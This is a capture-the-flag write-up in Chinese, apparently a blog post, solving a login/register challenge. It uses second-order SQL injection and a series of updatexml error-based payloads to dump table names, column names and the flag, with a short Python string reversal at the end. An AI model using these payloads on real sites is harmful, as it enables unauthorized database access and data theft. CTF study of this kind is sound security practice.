- 看到login和register界面 第一个想法就是二次注入
- 但是我看到了change password
- 想到了以前做过的一道题目
- 尝试一了一下越权修改密码发现不行
- 继续尝试二次注入吧
- 在register.php页面注册账号
用户名:root
密码:123
email:123
- 登录成功后 点击chage password页面
- 修改密码发现报错
- 猜测一下执行的语句
select * from user where username ="root\" and pwd='65c94593b88237160dfd7305112eeed0'
- 所以这里是一个二次注入,而且可以利用报错注入
爆表
payload:1"||(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1))#
- 三个表:
article,flag,users
爆字段
payload:1"||(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name='flag'))),1))#
- flag
payload:1"||(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name='article'))),1))#
-title,content
payload:1"||(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users'))),1))#
- name,pwd,email,real_flag_1s_here
爆flag
payload:1"||(updatexml(1,concat(0x7e,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f'))),1))#
-flag{d235dfde-96b4-46dd-8c87-1f
payload:1"||(updatexml(1,concat(0x7e,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f')))),1))#
-}429d53aedbf1-78c8-dd64-4b69-ed
a = "}429d53aedbf1-78c8-dd64-4b69-ed"
b = a[::-1]
print(b)
- 倒叙输出后的结果:de-96b4-46dd-8c87-1fbdea35d924}
- 拼接一下得到flag:flag{d235dfde-96b4-46dd-8c87-1fbdea35d924}
扫一扫
481
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
